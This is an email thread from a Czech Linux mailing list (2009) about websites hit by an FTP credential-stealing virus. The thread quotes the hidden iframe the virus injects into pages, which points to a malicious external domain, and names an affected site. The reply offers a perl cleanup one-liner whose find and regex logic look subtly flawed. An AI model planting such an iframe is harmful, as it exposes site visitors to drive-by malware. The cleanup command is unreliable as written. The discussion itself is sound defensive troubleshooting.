ftp hack
Premysl Hruby
dfenze na gmail.com
Čtvrtek Duben 9 15:46:43 CEST 2009
On (09/04/09 14:36), Jan Volešák wrote:
> To: Diskuse o Linuxu v cestine <linux na linux.cz>
> From: Jan Volešák <volesak na aristia.cz>
> Subject: ftp hack
> Reply-To: Diskuse o Linuxu v cestine <linux na linux.cz>
> List-Id: Diskuse o Linuxu v cestine <linux.linux.cz>
>
> Dobrý den,
> mohu se optat, zda se Vám náhodou nepřihodil ftp hack s nahrazením stránek main.htm, index.htm....stringem podobným tomuto:
> <iframe src="
> http://
> cut
> lot.cn/in.cgi?income50
> " width=1
> height=1 style="visibility: hidden
> "></iframe>
>
>
> Je to schválně narušeno znakem Enter aby to nepožraly antiviry
>
> POZOR, ten iframe je tam aktivní! Neklikejte pokud nemáte nějaký antivirus. Zbytečně jim naklikáte prachy :)
> Je to vidět např. na stránce: http://www.streleckarevue.cz/
> POZOR, ten iframe je tam aktivní! Neklikejte pokud nemáte nějaký antivirus. Zbytečně jim naklikáte prachy :)
>
> Jestli ano, jak se to přihodilo a jak jste to odstranili? Mě osobně se to nestalo. Ale zajímalo by mě to
> Díky
> Honza Volešák
Ano, bohuzel stalo. Na konec stranky (html a nekdy i .php a .inc soubory) to pridava
iframe podobny tomuto (jeste je varianta ktera obsahuje i position). A
taky pridava iframe na zacatek, hned tesne za body. Nic jineho nemeni.
AFAIK je to nejaky windows vir, ktery doluje ucty z ulozenych uctu v
Total Commanderu (mozna i jinde, ale vim hlavne o tomhle) a tedy na
strane serveru se tomu (krom omezeni pristupu na ftp podle IP, nebo
hlavne pouziti jineho -- bezpecnejsiho zpusobu nez FTP) neda branit.
btw:
find -type f -name '*.html' -o -name '*.htm' -print0 | xargs -0 perl -i.orig -pe 's{<iframe src="\S+" width=1
height=1 style="visibility:
?hidden(?:;position:absolute)"></iframe>}{}g'
obdobne i u php, tam jeste nejak pridava echo etc. Samozrejme si
nejdrive overte grepem, jestli u Vas nekdo nahodou nepouziva iframe s
podobnou strukturou (pripadne vyjmenovat v regexpu domeny ktere vir
pouziva, ale byva jich povicero).
-Ph
--
Premysl "Anydot" Hruby, http://www.redrum.cz/
-
I'm a signature virus. Please add me to your signature and help me spread!
Další informace o konferenci Linux